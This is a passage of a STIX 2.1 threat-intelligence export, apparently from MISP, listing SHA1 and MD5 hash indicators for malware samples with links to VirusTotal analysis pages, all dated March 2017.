"last_observed": "2017-03-29T09:40:09Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80f9-27dc-4cdb-b239-4d9002de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80f9-27dc-4cdb-b239-4d9002de0b81",
|
|
"value": "https://www.virustotal.com/file/f9583642689abf8b472ebd1f67b7ef9b7728837452ac476e68c3f06d62447c6d/analysis/1434463661/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80fa-5104-45d7-802f-410502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:10.000Z",
|
|
"modified": "2017-03-29T09:40:10.000Z",
|
|
"description": "sample - Xchecked via VT: 126636a1fb2e955970051505d834d3d3571105cb82b28393c05222332e29e9c1",
|
|
"pattern": "[file:hashes.SHA1 = 'f249846e7aa1feb38f4bf684df96ff8f032e2409']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:10Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80fb-731c-4ab8-9ff4-45fd02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:11.000Z",
|
|
"modified": "2017-03-29T09:40:11.000Z",
|
|
"description": "sample - Xchecked via VT: 126636a1fb2e955970051505d834d3d3571105cb82b28393c05222332e29e9c1",
|
|
"pattern": "[file:hashes.MD5 = 'e35ceeb67c9d0db80853152be8f3fab3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:11Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80fc-d06c-46dd-a10b-4a9e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:12.000Z",
|
|
"modified": "2017-03-29T09:40:12.000Z",
|
|
"first_observed": "2017-03-29T09:40:12Z",
|
|
"last_observed": "2017-03-29T09:40:12Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80fc-d06c-46dd-a10b-4a9e02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80fc-d06c-46dd-a10b-4a9e02de0b81",
|
|
"value": "https://www.virustotal.com/file/126636a1fb2e955970051505d834d3d3571105cb82b28393c05222332e29e9c1/analysis/1432541834/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80fd-f1a0-446b-96ec-459502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:13.000Z",
|
|
"modified": "2017-03-29T09:40:13.000Z",
|
|
"description": "sample - Xchecked via VT: ef704e0118c5935e0afd4632d10c1ef1e69ae026e73fcdc9d9b272db50a8aeba",
|
|
"pattern": "[file:hashes.SHA1 = '19444a55bfb284c3dc45089831ffcbd3600051db']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:13Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db80fe-9d30-497c-95fa-418602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:14.000Z",
|
|
"modified": "2017-03-29T09:40:14.000Z",
|
|
"description": "sample - Xchecked via VT: ef704e0118c5935e0afd4632d10c1ef1e69ae026e73fcdc9d9b272db50a8aeba",
|
|
"pattern": "[file:hashes.MD5 = '120e82f900390aa1a9378a7202fc7497']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:14Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db80ff-c584-4ba7-b078-4bac02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:15.000Z",
|
|
"modified": "2017-03-29T09:40:15.000Z",
|
|
"first_observed": "2017-03-29T09:40:15Z",
|
|
"last_observed": "2017-03-29T09:40:15Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db80ff-c584-4ba7-b078-4bac02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db80ff-c584-4ba7-b078-4bac02de0b81",
|
|
"value": "https://www.virustotal.com/file/ef704e0118c5935e0afd4632d10c1ef1e69ae026e73fcdc9d9b272db50a8aeba/analysis/1490388211/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8100-96e0-4e87-8b14-4ad702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:16.000Z",
|
|
"modified": "2017-03-29T09:40:16.000Z",
|
|
"description": "sample - Xchecked via VT: 09cef29d19f76796b6effae5d6e193efc98c9e1e9e6523566ec995a78daf3dfc",
|
|
"pattern": "[file:hashes.SHA1 = '4cea910a96e12a4e087d481dcf143a6bfcc08cd4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:16Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8100-1da4-40aa-b8d2-49c502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:16.000Z",
|
|
"modified": "2017-03-29T09:40:16.000Z",
|
|
"description": "sample - Xchecked via VT: 09cef29d19f76796b6effae5d6e193efc98c9e1e9e6523566ec995a78daf3dfc",
|
|
"pattern": "[file:hashes.MD5 = 'f75e8def30df26960975323ba253a7a8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:16Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8101-6a14-491c-bc2f-490002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:17.000Z",
|
|
"modified": "2017-03-29T09:40:17.000Z",
|
|
"first_observed": "2017-03-29T09:40:17Z",
|
|
"last_observed": "2017-03-29T09:40:17Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8101-6a14-491c-bc2f-490002de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8101-6a14-491c-bc2f-490002de0b81",
|
|
"value": "https://www.virustotal.com/file/09cef29d19f76796b6effae5d6e193efc98c9e1e9e6523566ec995a78daf3dfc/analysis/1457556235/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8102-6390-4d07-8cee-4b1902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:18.000Z",
|
|
"modified": "2017-03-29T09:40:18.000Z",
|
|
"description": "sample - Xchecked via VT: 0205f46daf74ac9a66ac89dad04b805528656e482f452e616e9f260f1ec6f710",
|
|
"pattern": "[file:hashes.SHA1 = '90e24187876fada337487e9f2cdefb0502bee2c1']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:18Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8103-c77c-4ca0-8631-42c002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:19.000Z",
|
|
"modified": "2017-03-29T09:40:19.000Z",
|
|
"description": "sample - Xchecked via VT: 0205f46daf74ac9a66ac89dad04b805528656e482f452e616e9f260f1ec6f710",
|
|
"pattern": "[file:hashes.MD5 = 'eb9a5f861cc417e7438645106ea6a21a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:19Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8104-9ab0-4bdc-85ad-457202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:20.000Z",
|
|
"modified": "2017-03-29T09:40:20.000Z",
|
|
"first_observed": "2017-03-29T09:40:20Z",
|
|
"last_observed": "2017-03-29T09:40:20Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8104-9ab0-4bdc-85ad-457202de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8104-9ab0-4bdc-85ad-457202de0b81",
|
|
"value": "https://www.virustotal.com/file/0205f46daf74ac9a66ac89dad04b805528656e482f452e616e9f260f1ec6f710/analysis/1441790904/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8106-0d94-44b0-84b5-499502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:22.000Z",
|
|
"modified": "2017-03-29T09:40:22.000Z",
|
|
"description": "sample - Xchecked via VT: 221302051095909ea47eac8ac8b9bcc82c51bab6946aca7c8822aee732fbee30",
|
|
"pattern": "[file:hashes.SHA1 = 'ba51f4d1ec3180014e2428fb50f8191a48ac07bb']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:22Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8107-a53c-4cd9-b86c-430a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:22.000Z",
|
|
"modified": "2017-03-29T09:40:22.000Z",
|
|
"description": "sample - Xchecked via VT: 221302051095909ea47eac8ac8b9bcc82c51bab6946aca7c8822aee732fbee30",
|
|
"pattern": "[file:hashes.MD5 = '53ca75b3c46ddd861c2e8d931779debc']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:22Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8107-62f0-43b5-b0cf-46fb02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:23.000Z",
|
|
"modified": "2017-03-29T09:40:23.000Z",
|
|
"first_observed": "2017-03-29T09:40:23Z",
|
|
"last_observed": "2017-03-29T09:40:23Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8107-62f0-43b5-b0cf-46fb02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8107-62f0-43b5-b0cf-46fb02de0b81",
|
|
"value": "https://www.virustotal.com/file/221302051095909ea47eac8ac8b9bcc82c51bab6946aca7c8822aee732fbee30/analysis/1441529137/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8108-73fc-4e37-b2e3-4e2702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:24.000Z",
|
|
"modified": "2017-03-29T09:40:24.000Z",
|
|
"description": "sample - Xchecked via VT: df4e6982fe1977a49e37239b2d28a60b39317eb8dcb3e383c74b70fa62007b47",
|
|
"pattern": "[file:hashes.SHA1 = '7813bc7451455b16a57c4db53a4231da75a0263a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:24Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8109-2678-4a3e-ad23-4f6902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:25.000Z",
|
|
"modified": "2017-03-29T09:40:25.000Z",
|
|
"description": "sample - Xchecked via VT: df4e6982fe1977a49e37239b2d28a60b39317eb8dcb3e383c74b70fa62007b47",
|
|
"pattern": "[file:hashes.MD5 = 'eee4bcce1107a6f3d7f44f11ec0c0e5a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:25Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db810a-1804-403f-b62c-4e2702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:26.000Z",
|
|
"modified": "2017-03-29T09:40:26.000Z",
|
|
"first_observed": "2017-03-29T09:40:26Z",
|
|
"last_observed": "2017-03-29T09:40:26Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db810a-1804-403f-b62c-4e2702de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db810a-1804-403f-b62c-4e2702de0b81",
|
|
"value": "https://www.virustotal.com/file/df4e6982fe1977a49e37239b2d28a60b39317eb8dcb3e383c74b70fa62007b47/analysis/1441533083/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db810b-7814-4eb7-923a-449c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:27.000Z",
|
|
"modified": "2017-03-29T09:40:27.000Z",
|
|
"description": "sample - Xchecked via VT: e3feff7f25d06c8e01d62d76a5f6272fa92f41ae05e0fbff51b67b9cc55cf452",
|
|
"pattern": "[file:hashes.SHA1 = '3581938cf70aef4a389f34010c9a145a27c5274c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:27Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db810c-e3e0-429a-b9b4-469f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:28.000Z",
|
|
"modified": "2017-03-29T09:40:28.000Z",
|
|
"description": "sample - Xchecked via VT: e3feff7f25d06c8e01d62d76a5f6272fa92f41ae05e0fbff51b67b9cc55cf452",
|
|
"pattern": "[file:hashes.MD5 = '04e152179fad2b75d9202b0ae46072c9']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:28Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db810d-1888-47ed-9297-49f502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:29.000Z",
|
|
"modified": "2017-03-29T09:40:29.000Z",
|
|
"first_observed": "2017-03-29T09:40:29Z",
|
|
"last_observed": "2017-03-29T09:40:29Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db810d-1888-47ed-9297-49f502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db810d-1888-47ed-9297-49f502de0b81",
|
|
"value": "https://www.virustotal.com/file/e3feff7f25d06c8e01d62d76a5f6272fa92f41ae05e0fbff51b67b9cc55cf452/analysis/1475942844/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db810e-f78c-480a-8e06-46f202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:30.000Z",
|
|
"modified": "2017-03-29T09:40:30.000Z",
|
|
"description": "sample - Xchecked via VT: d23d4055c99b7bd3581a83443d934c95d2ec8dd9c690ba29b611e64587add39f",
|
|
"pattern": "[file:hashes.SHA1 = 'd714c19d6675d36566bf306c9f2dc6f945daba29']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:30Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db810f-b4ec-45e7-bb0a-467b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:31.000Z",
|
|
"modified": "2017-03-29T09:40:31.000Z",
|
|
"description": "sample - Xchecked via VT: d23d4055c99b7bd3581a83443d934c95d2ec8dd9c690ba29b611e64587add39f",
|
|
"pattern": "[file:hashes.MD5 = '1b5210e7fe38a80e7e43a74d52c688ad']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:31Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8110-b384-4144-9aff-428202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:32.000Z",
|
|
"modified": "2017-03-29T09:40:32.000Z",
|
|
"first_observed": "2017-03-29T09:40:32Z",
|
|
"last_observed": "2017-03-29T09:40:32Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8110-b384-4144-9aff-428202de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8110-b384-4144-9aff-428202de0b81",
|
|
"value": "https://www.virustotal.com/file/d23d4055c99b7bd3581a83443d934c95d2ec8dd9c690ba29b611e64587add39f/analysis/1475972940/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8111-712c-49b2-a145-41c402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:33.000Z",
|
|
"modified": "2017-03-29T09:40:33.000Z",
|
|
"description": "sample - Xchecked via VT: ca752bfec0b9f14a36c69e0c90edcc846f67923ae81ef5c5719480aecbbedff9",
|
|
"pattern": "[file:hashes.SHA1 = '160b8a75869a1cfea3618531efc5bb85141ebb5c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:33Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8112-75c8-4bdf-a52b-4b2902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:34.000Z",
|
|
"modified": "2017-03-29T09:40:34.000Z",
|
|
"description": "sample - Xchecked via VT: ca752bfec0b9f14a36c69e0c90edcc846f67923ae81ef5c5719480aecbbedff9",
|
|
"pattern": "[file:hashes.MD5 = '62ce719ddd1b33879f6e3c6102de1a57']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:34Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8113-3c88-4ab5-b217-471802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:35.000Z",
|
|
"modified": "2017-03-29T09:40:35.000Z",
|
|
"first_observed": "2017-03-29T09:40:35Z",
|
|
"last_observed": "2017-03-29T09:40:35Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8113-3c88-4ab5-b217-471802de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8113-3c88-4ab5-b217-471802de0b81",
|
|
"value": "https://www.virustotal.com/file/ca752bfec0b9f14a36c69e0c90edcc846f67923ae81ef5c5719480aecbbedff9/analysis/1434379333/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8114-8b94-4483-a487-4c3102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:36.000Z",
|
|
"modified": "2017-03-29T09:40:36.000Z",
|
|
"description": "sample - Xchecked via VT: d9c2be7b02dcf65889d764ba4ebf9908672c2a234cb4291d89826ff749909623",
|
|
"pattern": "[file:hashes.SHA1 = '011f45e2b08d0932d0c63fa4f87b87ad1fcd0f63']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:36Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8115-0dbc-4f6c-9c4a-438502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:37.000Z",
|
|
"modified": "2017-03-29T09:40:37.000Z",
|
|
"description": "sample - Xchecked via VT: d9c2be7b02dcf65889d764ba4ebf9908672c2a234cb4291d89826ff749909623",
|
|
"pattern": "[file:hashes.MD5 = '1e38994e2df6e2a970df0d071b49cf66']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:40:37Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8116-dbcc-4aad-a513-412702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:40:38.000Z",
|
|
"modified": "2017-03-29T09:40:38.000Z",
|
|
"first_observed": "2017-03-29T09:40:38Z",
|
|
"last_observed": "2017-03-29T09:40:38Z",
|
|
